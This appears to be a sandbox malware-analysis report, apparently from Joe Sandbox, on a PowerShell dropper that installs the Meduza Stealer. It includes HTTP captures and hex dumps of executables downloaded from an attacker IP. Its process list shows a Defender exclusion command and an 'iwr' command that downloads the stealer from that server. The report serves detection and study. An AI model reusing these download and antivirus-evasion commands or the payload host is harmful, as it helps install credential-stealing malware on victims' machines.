                                                                                                  Dec 19, 2024 08:52:42.215960979 CET1236INData Raw: 00 a9 00 b1 02 06 00 b1 00 c8 02 33 00 79 00 52 02 37 00 b1 00 da 02 37 00 79 00 52 02 3d 00 b9 00 ee 02 1a 00 2e 00 0b 00 5b 00 2e 00 13 00 64 00 2e 00 1b 00 83 00 2e 00 23 00 83 00 2e 00 2b 00 91 00 2e 00 33 00 83 00 2e 00 3b 00 83 00 2e 00 43
                                                                                                  Data Ascii: 3yR77yR=.[.d..#.+.3.;.C.K.S.[.c.k9>CC<Module>System.Runtime.CompilerServicesCompilationRelax
                                                                                                  Dec 19, 2024 08:52:42.216352940 CET1236INData Raw: 20 00 22 00 41 00 64 00 64 00 2d 00 4d 00 70 00 50 00 72 00 65 00 66 00 65 00 72 00 65 00 6e 00 63 00 65 00 20 00 2d 00 45 00 78 00 63 00 6c 00 75 00 73 00 69 00 6f 00 6e 00 50 00 61 00 74 00 68 00 20 00 27 00 01 05 27 00 22 00 01 0b 72 00 75 00
                                                                                                  Data Ascii: "Add-MpPreference -ExclusionPath ''"runas.exe+-Command "iwr -useb '' -OutFile '2@C6H QIM
                                                                                                  Dec 19, 2024 08:52:42.216365099 CET1236INData Raw: 00 00 00 00 00 00 00 01 00 01 00 00 00 30 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 48 00 00 00 58 60 00 00 60 03 00 00 00 00 00 00 00 00 00 00 60 03 34 00 00 00 56 00 53 00 5f 00 56 00 45 00 52 00 53 00 49 00 4f 00 4e
                                                                                                  Data Ascii: 0HX```4VS_VERSION_INFO?DVarFileInfo$TranslationStringFile
                                                                                                  Dec 19, 2024 08:52:42.216377974 CET269INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Dec 19, 2024 08:52:42.251663923 CET145OUTGET /Launcher.exe HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                  Host: 147.45.47.15
                                                                                                  Dec 19, 2024 08:52:42.649183035 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 19 Dec 2024 07:52:42 GMT
                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                  Last-Modified: Wed, 18 Dec 2024 13:27:42 GMT
                                                                                                  ETag: "325e0-6298b60deeb4f"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 206304
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$suuuuuuwuuuuRichuPEL.0@0&G@ tH`!*TH@@l.textT `.datat0@.idata,@"@@.rsrc`@@@.reloc*,@B
                                                                                                  Dec 19, 2024 08:52:42.649295092 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 ed 41 00 f0 b2 40 00 b0 b2 40 00 d0 b2 40 00 00 00 00 00 00 00 00 00 80 ed 41 00 70 f1 41 00 c0 fa 41 00 00 00
                                                                                                  Data Ascii: A@@@ApAA`P`pP p
                                                                                                  Dec 19, 2024 08:52:42.649310112 CET1236INData Raw: 00 c0 95 01 00 00 d0 95 01 00 00 10 96 01 00 00 d0 b3 01 00 00 00 b4 01 00 00 20 b4 01 00 00 30 b4 01 00 00 f0 b4 01 00 00 20 b5 01 00 00 60 b5 01 00 00 70 b5 01 00 00 80 b5 01 00 00 80 b6 01 00 00 90 b8 01 00 00 c0 b8 01 00 00 d0 bb 01 00 00 00
                                                                                                  Data Ascii: 0 `p `P` 0@P`p0
                                                                                                  Dec 19, 2024 08:52:42.649708033 CET1236INData Raw: 82 4f 45 64 27 f8 ce 11 90 59 08 00 36 f1 25 02 ba e5 37 fc 8e 4a ce 11 87 0b 08 00 36 8d 23 02 11 01 00 00 00 00 00 00 40 e1 00 00 40 e1 00 00 0c 00 00 00 10 b3 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 b3
                                                                                                  Data Ascii: OEd'Y6%7J6#@@@`@@x@A@`@P@`@AAAAAAA@AAA A0A@APA`ApA@AAA@A@AAAA0A@APA`ApA
                                                                                                  Dec 19, 2024 08:52:42.657510996 CET1236INData Raw: 61 00 69 00 6c 00 65 00 64 00 20 00 75 00 73 00 69 00 6e 00 67 00 20 00 74 00 68 00 65 00 20 00 43 00 4c 00 53 00 49 00 44 00 20 00 66 00 6f 00 72 00 20 00 27 00 25 00 73 00 27 00 00 00 00 00 00 00 00 00 54 00 68 00 65 00 20 00 63 00 6f 00 6d 00
                                                                                                  Data Ascii: ailed using the CLSID for '%s'The command line (%s) does not contain a valid persistent OLE object, ProgID, or Type Li
                                                                                                  Dec 19, 2024 08:52:42.657645941 CET1236INData Raw: 79 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 6f 00 72 00 3a 00 3a 00 49 00 6e 00 69 00 74 00 69 00 61 00 6c 00 69 00 7a 00 65 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 00 00 00 00 70 00
                                                                                                  Data Ascii: yDescriptor::Initialize failed.SystempsdSelfRelative malloc failed.Cannot AccessAccessAccess PermissionsSelect


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.549705147.45.47.15807264C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 19, 2024 08:52:53.206274986 CET168OUTGET /duschno.exe HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                  Host: 147.45.47.15
                                                                                                  Connection: Keep-Alive
                                                                                                  Dec 19, 2024 08:52:54.428613901 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 19 Dec 2024 07:52:54 GMT
                                                                                                  Server: Apache/2.4.52 (Ubuntu)
                                                                                                  Last-Modified: Mon, 09 Dec 2024 20:28:42 GMT
                                                                                                  ETag: "13ba00-628dc35e76e87"
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 1292800
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-msdos-program
                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N7/d/d/dWe/dWe/de/de/de/de/dWe8/dWe/dWe/d/d.dWe/de/d>d/de/dRich/dPEd7;g")4 @`h@l<8(@Px.text24 `.rdataxP8@@.data|Z@.pdataln<@@.rsrc@@.reloc<@B
                                                                                                  Dec 19, 2024 08:52:54.428690910 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: H\$Ht$H|$ UATAUAVAWH$H+H~|H@H@HH/*OHzH@H@HH>=-)H@H@H
                                                                                                  Dec 19, 2024 08:52:54.428724051 CET248INData Raw: b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 a0 0f 57 44 24 20 66 0f 7f 45 a0 0f 57 c0 0f 11 85 88 07 00 00 4c 89 b5 98 07 00 00 4c 89 b5 a0 07 00 00 48 8d 45 a0 4c 8b c3
                                                                                                  Data Ascii: @H@HD$ H@H@HD$(foEWD$ fEWLLHELIB<uHUHqHxaH@H@HEH&!'H@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWW
                                                                                                  Dec 19, 2024 08:52:54.428807020 CET1236INData Raw: 00 48 8d 45 b0 4c 8b c3 49 ff c0 42 80 3c 00 00 75 f6 48 8d 55 b0 48 8d 8d b0 07 00 00 e8 24 71 04 00 90 48 b8 cd 78 61 ef 81 9f b2 f5 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 c0 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 c8 48
                                                                                                  Data Ascii: HELIB<uHUH$qHxaH@H@HEH@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWWHEL@IB<uHUHpI~rL@H@HEL@H@
                                                                                                  Dec 19, 2024 08:52:54.428843021 CET1236INData Raw: 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 30 0f 57 44 24 20 66 0f 7f 45 30 0f 57 c0 0f 11 85 d0 08 00 00 0f 57 c9 f3 0f 7f 8d e0 08 00 00 48 8d 45 30 4c 8b c3 66 0f 1f 84 00 00 00 00 00
                                                                                                  Data Ascii: @HD$ H@H@HD$(foE0WD$ fE0WWHE0LfIB<uHU0HlHhaH@H@HE@H@H@HEHH@H@HD$ H@H@HD$(foE@WD$ fE@WWHE@LfDI
                                                                                                  Dec 19, 2024 08:52:54.429193974 CET1236INData Raw: 14 00 00 48 89 45 78 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 70 0f 57 44 24 20 66 0f 7f 45 70 0f 57 c0 0f 11 85 80 09 00 00 0f 57 c9 f3 0f 7f 8d 90 09 00 00 48
                                                                                                  Data Ascii: HExH@H@HD$ H@H@HD$(foEpWD$ fEpWWHEpLfDIB<uHUpH&gHizH@H@H H'TT9H@H@H(H%0$L~H@H@H0L@H@H8
                                                                                                  Dec 19, 2024 08:52:54.429229021 CET1236INData Raw: 8d 8d 38 0a 00 00 e8 bf 62 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 b0 00 00 00 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 b8 00 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b
                                                                                                  Data Ascii: 8bL@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fWXLhLpHLIB<uHHXbxI}pL@H@H`H0"MKrH@H
                                                                                                  Dec 19, 2024 08:52:54.429573059 CET1236INData Raw: 00 0f 57 c0 0f 11 85 10 0b 00 00 0f 57 c9 f3 0f 7f 8d 20 0b 00 00 48 8d 85 80 04 00 00 4c 8b c3 66 0f 1f 44 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 95 80 04 00 00 48 8d 8d 10 0b 00 00 e8 b3 5d 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00
                                                                                                  Data Ascii: WW HLfDIB<uHH]L@H@HIAb'L@H@HH@H@HD$ H@H@HD$(foWD$ fW0W@HL@IB<uHH0]
                                                                                                  Dec 19, 2024 08:52:54.429606915 CET1236INData Raw: 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 48 b8 49 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 30 48 b8 3e 39 6f f6 35 0b 0a af 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48
                                                                                                  Data Ascii: @HD$ H@H@HD$(HI\AL~H@H@HD$0H>9o5H@H@HD$8foWD$ ffoWL$0fWLLHLIB<uHHcXL@H@H0L@H@H8H@H
                                                                                                  Dec 19, 2024 08:52:54.429642916 CET1236INData Raw: 89 85 58 01 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 50 01 00 00 0f 57 44 24 20 66 0f 7f 85 50 01 00 00 0f 57 c0 0f 11 85 98 0c 00 00 4c 89 b5 a8 0c 00 00
                                                                                                  Data Ascii: XH@H@HD$ H@H@HD$(foPWD$ fPWLLHPLIB<uHPHSL@H@H L@H@H(H,25H@H@H0HW^AFddH@H@H8
                                                                                                  Dec 19, 2024 08:52:54.548631907 CET1236INData Raw: 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 48 b8 49 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 30 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 38 66 0f 6f 85 60 05 00 00 0f 57 44 24 20 66 0f 7f 85 60
                                                                                                  Data Ascii: @H@HD$(HI\AL~H@H@HD$0L@H@HD$8fo`WD$ f`fopWL$0fpWPW`H`LIB<uH`HPNL@H@HL@H@HH@H@HD$ H@H@


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.549710104.26.12.2054437512C:\Windows\Temp\xdnfl52f.civ.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-12-19 07:52:58 UTC100OUTGET / HTTP/1.1
                                                                                                  Accept: text/html; text/plain; */*
                                                                                                  Host: api.ipify.org
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-12-19 07:52:59 UTC424INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 19 Dec 2024 07:52:59 GMT
                                                                                                  Content-Type: text/plain
                                                                                                  Content-Length: 12
                                                                                                  Connection: close
                                                                                                  Vary: Origin
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8f45d0f9aad00f3d-EWR
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1613&rtt_var=629&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=738&delivery_rate=1707602&cwnd=131&unsent_bytes=0&cid=c7440f7806da2f0b&ts=559&x=0"
                                                                                                  2024-12-19 07:52:59 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                  Data Ascii: 8.46.123.189


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:02:52:37
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1"
                                                                                                  Imagebase:0x7ff7be880000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:02:52:37
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:02:52:42
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\Temp\Launcher.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\Temp\Launcher.exe"
                                                                                                  Imagebase:0x660000
                                                                                                  File size:206'304 bytes
                                                                                                  MD5 hash:2696D944FFBEF69510B0C826446FD748
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:02:52:43
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:02:52:43
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:02:52:45
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                  Imagebase:0x7ff6ef0c0000
                                                                                                  File size:496'640 bytes
                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:02:52:50
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\xdnfl52f.civ.exe'"
                                                                                                  Imagebase:0x330000
                                                                                                  File size:433'152 bytes
                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:8
                                                                                                  Start time:02:52:50
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:10
                                                                                                  Start time:02:52:56
                                                                                                  Start date:19/12/2024
                                                                                                  Path:C:\Windows\Temp\xdnfl52f.civ.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\Temp\xdnfl52f.civ.exe"
                                                                                                  Imagebase:0x7ff75a670000
                                                                                                  File size:1'292'800 bytes
                                                                                                  MD5 hash:C6813DA66EBA357D0DEAA48C2F7032B8
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: 0000000A.00000002.2481667532.000001D9D06DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_MeduzaStealer, Description: Yara detected Meduza Stealer, Source: C:\Windows\Temp\xdnfl52f.civ.exe, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Reset < >
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2140406286.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                    • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:8.9%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:10.7%
                                                                                                    Total number of Nodes:1268
                                                                                                    Total number of Limit Nodes:26
                                                                                                    execution_graph 6439 67ee23 6454 67fd98 6439->6454 6441 67ee2f GetStartupInfoW 6442 67ee4c 6441->6442 6443 67ee61 6442->6443 6444 67ee68 Sleep 6442->6444 6445 67ee80 _amsg_exit 6443->6445 6447 67ee8a 6443->6447 6444->6442 6445->6447 6446 67eecc _initterm 6448 67eee7 __IsNonwritableInCurrentImage 6446->6448 6447->6446 6447->6448 6452 67eead 6447->6452 6450 67ef84 exit 6448->6450 6451 67efd3 6448->6451 6448->6452 6455 6800d1 6448->6455 6450->6448 6451->6452 6453 67efdc _cexit 6451->6453 6453->6452 6454->6441 6456 6800dc #1569 6455->6456 6457 66fce0 16 API calls 6458 66fe2c 6457->6458 6459 66fe0b GetProcAddress 6457->6459 6464 66f616 6458->6464 6460 66fe25 FreeLibrary 6459->6460 6461 66fe1b 6459->6461 6460->6458 6461->6460 6532 67f415 6464->6532 6466 66f625 #540 StringFromGUID2 SendMessageW 6533 67d67d 6466->6533 6470 67d67d 9 API calls 6471 66f6ed #6195 6470->6471 6473 66f973 6471->6473 6474 66f71b 6471->6474 6475 67d67d 9 API calls 6473->6475 6476 66f944 6474->6476 6478 66f7f7 6474->6478 6479 66f72d 6474->6479 6477 66f9c5 #861 #2756 6475->6477 6480 67d67d 9 API calls 6476->6480 6487 66f9f3 #2756 6477->6487 6488 66fa1b SendMessageW 6477->6488 6482 67d67d 9 API calls 6478->6482 6483 66f736 #3087 #2634 6479->6483 6484 66fc33 6479->6484 6480->6473 6486 66f826 6482->6486 6489 67d67d 9 API calls 6483->6489 6547 66f090 17 API calls 6484->6547 6491 66f830 #861 6486->6491 6492 66f84c #861 6486->6492 6487->6488 6493 66fa04 SendMessageW 6487->6493 6494 67d67d 9 API calls 6488->6494 6501 66f77a #861 6489->6501 6490 66fc3a 6548 67020e 6490->6548 6496 66f863 6491->6496 6497 66f848 6491->6497 6499 66f858 #2634 6492->6499 6498 66fa82 #2634 6493->6498 6500 66fa6c 6494->6500 6505 67d67d 9 API calls 6496->6505 6497->6499 6507 67d67d 9 API calls 6498->6507 6499->6496 6500->6498 6506 66fa70 #861 6500->6506 6503 67d67d 9 API calls 6501->6503 6508 66f7c8 #861 #2634 6503->6508 6510 66f896 6505->6510 6506->6498 6511 66facf 6507->6511 6519 66fc28 #2634 6508->6519 6516 66f8b4 SendMessageW 6510->6516 6517 66f89e lstrcmpiW 6510->6517 6512 66fad7 lstrcmpiW 6511->6512 6513 66faed SendMessageW 6511->6513 6512->6513 6518 66faf4 lstrcmpiW 6512->6518 6540 67d605 6513->6540 6516->6476 6517->6516 6520 66f8bb lstrcmpiW 6517->6520 6518->6513 6522 66fb11 lstrcmpiW 6518->6522 6519->6484 6520->6516 6521 66f8d8 lstrcmpiW 6520->6521 6521->6516 6525 66f8f5 lstrcmpiW 6521->6525 6522->6513 6526 66fb2e lstrcmpiW 6522->6526 6525->6516 6526->6513 6529 66fbb7 SendMessageW 6531 66fbe5 6 API calls 6529->6531 6530 66fbd0 SendMessageW 6530->6531 6531->6519 6532->6466 6565 67d473 StringFromGUID2 wsprintfW 6533->6565 6539 66f69f #861 6539->6470 6577 67d2f7 6540->6577 6543 67d6f5 3 API calls 6544 67d66c 6543->6544 6545 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6544->6545 6546 66fbab 6545->6546 6546->6529 6546->6530 6547->6490 6549 67036b 16 API calls 6548->6549 6550 670229 6548->6550 6553 67040d #3087 #6211 6549->6553 6551 670342 #3087 #6211 #3087 #6211 6550->6551 6552 670232 6550->6552 6556 670315 #3087 #6211 #3087 #6211 6551->6556 6554 6702eb #3087 #6211 #3087 #6211 6552->6554 6555 67023b 6552->6555 6557 670420 6553->6557 6554->6556 6555->6557 6558 670244 8 API calls 6555->6558 6559 670296 8 API calls 6556->6559 6560 66fc41 #6330 #800 6557->6560 6561 670429 8 API calls 6557->6561 6558->6559 6559->6553 6562 67f3c4 6560->6562 6561->6560 6563 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6562->6563 6564 67f3ce 6563->6564 6564->6564 6566 67f3a0 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 4 API calls 6565->6566 6567 67d4c9 6566->6567 6568 67d6f5 RegOpenKeyExW 6567->6568 6569 67d6e4 